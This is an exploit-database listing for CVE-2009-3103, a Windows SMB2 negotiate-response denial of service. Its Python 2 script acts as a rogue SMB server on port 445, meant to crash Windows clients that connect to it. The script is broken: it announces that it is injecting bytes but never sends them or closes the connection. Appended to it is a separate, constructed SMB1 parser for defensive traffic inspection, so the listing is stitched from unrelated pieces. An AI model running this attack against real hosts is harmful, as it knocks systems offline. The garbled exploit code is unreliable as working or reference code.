Windows SMB2 Negotiate Protocol 0x72 Response DoS

ID EDB-ID:12524
Type exploitdb
Reporter Jelmer de Hen
Modified 2010-05-07T00:00:00


Windows SMB2 Negotiate Protocol (0x72) Response DoS. CVE-2009-3103. DoS exploit for the Windows platform.


# === EDIT – this exploit appears to be exactly the same as one which was already found
# and fixed, notified by Laurent Gaffié; I did not know this, but his blog post can be found here:

import socket,sys,time

print "Malformed negotiate protocol response and quickly closing the connection causes Windows machines supporting SMB2 to crash (leaves the system hanging and unresponsive) -- tested on Win 7 build 2600"
print "Written by Jelmer de Hen"
print "Published at"
smb = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
smb.bind(("", 445))
smbconn, addr = smb.accept()
print "[+] "+str(addr)+" is trying to make connection to us over port 445"
while 1:
	new_packet = smbconn.recv(1024)
	print "[+] Waiting for a negotiate request packet"
	if new_packet[8]=="r":
		print "[+] Received the negotiate request packet injecting the 4 bytes now..."
print "[+] Closing connection... This is part of the exploit"
print "[+] Done, if all went good then the box on the other side crashed"
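
Added example (not part of the original listing or the reporter's code): the script above recognises the client's request by comparing byte 8 of the received data with "r", which is 0x72, the SMB1 Negotiate command that follows the 4-byte NetBIOS session header and the 4-byte \xffSMB marker. This Python 3 parser reads such a frame from captured traffic and lists the dialects the client offers, so a defender can see which hosts advertise SMB2; the function names and the sample frame are constructed for illustration.

```python
import struct

SMB1_MAGIC = b"\xffSMB"
SMB_COM_NEGOTIATE = 0x72  # ord("r"): the byte the script tests at offset 8

def parse_negotiate(frame):
    """Return the dialects of an SMB1 Negotiate request, None for other commands.

    Layout: 4-byte NetBIOS session header, 32-byte SMB1 header, WordCount,
    ByteCount, then entries of 0x02 + NUL-terminated dialect name.
    Raises ValueError on truncated or inconsistent input.
    """
    if len(frame) < 4 + 32 + 3:
        raise ValueError("too short for NetBIOS + SMB1 header")
    if frame[0] != 0x00 or int.from_bytes(frame[1:4], "big") != len(frame) - 4:
        raise ValueError("bad NetBIOS session header")
    if frame[4:8] != SMB1_MAGIC:
        raise ValueError("not an SMB1 message")
    if frame[8] != SMB_COM_NEGOTIATE:
        return None
    if frame[36] != 0:
        raise ValueError("Negotiate request must have WordCount 0")
    (byte_count,) = struct.unpack_from("<H", frame, 37)
    data = frame[39:39 + byte_count]
    if len(data) != byte_count:
        raise ValueError("ByteCount runs past the end of the frame")
    dialects = []
    while data:
        end = data.find(b"\x00", 1)
        if data[0] != 0x02 or end == -1:
            raise ValueError("malformed dialect entry")
        dialects.append(data[1:end].decode("ascii"))
        data = data[end + 1:]
    return dialects

def offers_smb2(dialects):
    """True if the client advertised an SMB2 dialect such as "SMB 2.002"."""
    return any(d.startswith("SMB 2") for d in dialects or [])

def build_sample(dialects, command=SMB_COM_NEGOTIATE):
    """Constructed test frame (zeroed header fields), not captured traffic."""
    body = b"".join(b"\x02" + d.encode("ascii") + b"\x00" for d in dialects)
    smb = (SMB1_MAGIC + bytes([command]) + b"\x00" * 27
           + b"\x00" + struct.pack("<H", len(body)) + body)
    return b"\x00" + len(smb).to_bytes(3, "big") + smb

if __name__ == "__main__":
    sample = build_sample(["NT LM 0.12", "SMB 2.002"])
    print(parse_negotiate(sample), offers_smb2(parse_negotiate(sample)))
```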